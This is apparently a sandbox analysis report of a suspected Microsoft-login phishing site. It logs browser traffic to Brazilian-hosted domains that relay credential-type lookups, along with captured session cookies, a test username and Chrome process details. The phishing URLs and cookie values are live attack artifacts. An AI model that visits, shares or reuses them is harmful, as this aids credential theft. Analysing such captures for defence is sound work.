                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8T [TRUNCATED]
                                                        2025-03-17 16:43:29 UTC1952OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 71 33 31 62 66 40 6f 78 6b 66 71 78 2e 63 6f 6d 22 2c 22 69 73 4f 74 68 65 72 49 64 70 53 75 70 70 6f 72 74 65 64 22 3a 74 72 75 65 2c 22 63 68 65 63 6b 50 68 6f 6e 65 73 22 3a 66 61 6c 73 65 2c 22 69 73 52 65 6d 6f 74 65 4e 47 43 53 75 70 70 6f 72 74 65 64 22 3a 74 72 75 65 2c 22 69 73 43 6f 6f 6b 69 65 42 61 6e 6e 65 72 53 68 6f 77 6e 22 3a 66 61 6c 73 65 2c 22 69 73 46 69 64 6f 53 75 70 70 6f 72 74 65 64 22 3a 74 72 75 65 2c 22 6f 72 69 67 69 6e 61 6c 52 65 71 75 65 73 74 22 3a 22 72 51 51 49 41 52 41 41 68 5a 49 5f 6a 4e 74 30 48 4d 58 6a 35 43 35 33 46 77 47 4e 43 6b 4b 30 59 72 69 42 41 61 48 61 5f 73 56 32 5f 4f 65 6b 56 6e 4a 69 79 5f 6c 6e 4f 32 6c 38 63 65 7a 46 63 68 4c 5f 69 57 50 48 54 76 77 76 79 64
                                                        Data Ascii: {"username":"wq31bf@oxkfqx.com","isOtherIdpSupported":true,"checkPhones":false,"isRemoteNGCSupported":true,"isCookieBannerShown":false,"isFidoSupported":true,"originalRequest":"rQQIARAAhZI_jNt0HMXj5C53FwGNCkK0YriBAaHa_sV2_OekVnJiy_lnO2l8cezFchL_iWPHTvwvyd
                                                        2025-03-17 16:43:30 UTC2009INHTTP/1.1 200 OK
                                                        Cache-Control: no-store, no-cache
                                                        Pragma: no-cache
                                                        Content-Type: application/json; charset=utf-8
                                                        Expires: -1
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                        client-request-id: 3919d2b8-ef20-4407-9286-cb3e9c1aba71
                                                        x-ms-request-id: b63fb938-d5f0-4e90-a063-ec1153b30e00
                                                        x-ms-ests-server: 2.1.20329.5 - WUS3 ProdSlices
                                                        nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                        x-ms-srs: 1.P
                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                        Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-oZoXYnweQQzKiJnR2ts7XQ' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                        Set-Cookie: fpc=AjUAFJMlP0ZCgsS-Ll1segK8Ae7AAQAAAAdIat8OAAAA; expires=Wed, 16-Apr-2025 16:43:30 GMT; path=/; secure; HttpOnly; SameSite=None
                                                        Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                        Date: Mon, 17 Mar 2025 16:43:29 GMT
                                                        Connection: close
                                                        content-length: 1269
                                                        Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                        2025-03-17 16:43:30 UTC1269INData Raw: 7b 22 55 73 65 72 6e 61 6d 65 22 3a 22 77 71 33 31 62 66 40 6f 78 6b 66 71 78 2e 63 6f 6d 22 2c 22 44 69 73 70 6c 61 79 22 3a 22 77 71 33 31 62 66 40 6f 78 6b 66 71 78 2e 63 6f 6d 22 2c 22 49 66 45 78 69 73 74 73 52 65 73 75 6c 74 22 3a 31 2c 22 49 73 55 6e 6d 61 6e 61 67 65 64 22 3a 66 61 6c 73 65 2c 22 54 68 72 6f 74 74 6c 65 53 74 61 74 75 73 22 3a 31 2c 22 43 72 65 64 65 6e 74 69 61 6c 73 22 3a 7b 22 50 72 65 66 43 72 65 64 65 6e 74 69 61 6c 22 3a 31 2c 22 48 61 73 50 61 73 73 77 6f 72 64 22 3a 74 72 75 65 2c 22 52 65 6d 6f 74 65 4e 67 63 50 61 72 61 6d 73 22 3a 6e 75 6c 6c 2c 22 46 69 64 6f 50 61 72 61 6d 73 22 3a 6e 75 6c 6c 2c 22 51 72 43 6f 64 65 50 69 6e 50 61 72 61 6d 73 22 3a 6e 75 6c 6c 2c 22 53 61 73 50 61 72 61 6d 73 22 3a 6e 75 6c 6c 2c 22
                                                        Data Ascii: {"Username":"wq31bf@oxkfqx.com","Display":"wq31bf@oxkfqx.com","IfExistsResult":1,"IsUnmanaged":false,"ThrottleStatus":1,"Credentials":{"PrefCredential":1,"HasPassword":true,"RemoteNgcParams":null,"FidoParams":null,"QrCodePinParams":null,"SasParams":null,"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        45192.168.2.44980923.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:43:31 UTC1975OUTGET /common/GetCredentialType?mkt=en-US HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8T [TRUNCATED]
                                                        2025-03-17 16:43:31 UTC1951INHTTP/1.1 200 OK
                                                        Cache-Control: no-store, no-cache
                                                        Pragma: no-cache
                                                        Content-Type: application/json; charset=utf-8
                                                        Expires: -1
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                        x-ms-request-id: 77ef5168-5275-4c6d-b5c7-2df85c381000
                                                        x-ms-ests-server: 2.1.20329.5 - WUS3 ProdSlices
                                                        nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                        x-ms-srs: 1.P
                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                        Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-6z0NSsfPdGXqXD0B_Vupaw' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                        Set-Cookie: fpc=AjUAFJMlP0ZCgsS-Ll1segK8Ae7AAQAAAAdIat8OAAAA; expires=Wed, 16-Apr-2025 16:43:31 GMT; path=/; secure; HttpOnly; SameSite=None
                                                        Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                        Date: Mon, 17 Mar 2025 16:43:30 GMT
                                                        Connection: close
                                                        content-length: 164
                                                        Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                        2025-03-17 16:43:31 UTC164INData Raw: 7b 22 65 72 72 6f 72 22 3a 7b 22 63 6f 64 65 22 3a 36 31 30 30 2c 22 73 74 73 45 72 72 6f 72 22 3a 22 41 41 44 53 54 53 39 30 30 35 36 31 22 2c 22 63 6f 72 72 65 6c 61 74 69 6f 6e 49 64 22 3a 22 66 30 36 64 38 62 35 63 2d 34 62 38 34 2d 34 31 33 62 2d 38 63 31 64 2d 33 34 32 32 62 61 35 64 61 39 64 62 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 35 2d 30 33 2d 31 37 20 31 36 3a 34 33 3a 33 31 5a 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 41 41 44 53 54 53 39 30 30 35 36 31 22 7d 7d
                                                        Data Ascii: {"error":{"code":6100,"stsError":"AADSTS900561","correlationId":"f06d8b5c-4b84-413b-8c1d-3422ba5da9db","timestamp":"2025-03-17 16:43:31Z","message":"AADSTS900561"}}


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to jump to process

                                                        Target ID:1
                                                        Start time:12:42:15
                                                        Start date:17/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                        Imagebase:0x7ff786830000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:2
                                                        Start time:12:42:18
                                                        Start date:17/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=3340,i,1354710186197194451,1516178957246450856,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3440 /prefetch:3
                                                        Imagebase:0x7ff786830000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:4
                                                        Start time:12:42:24
                                                        Start date:17/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://h89s9dhj.ccbequipamentos.com.br/?noiajvga=2bdd817baf4e46e28f740a82bff8e850881b2c9159d1f9f1d332e339e76eea813a3f5893897cb7539a84e2eac2026594b5d62df0bbf5820b252c5afd2b02c9cd"
                                                        Imagebase:0x7ff786830000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        No disassembly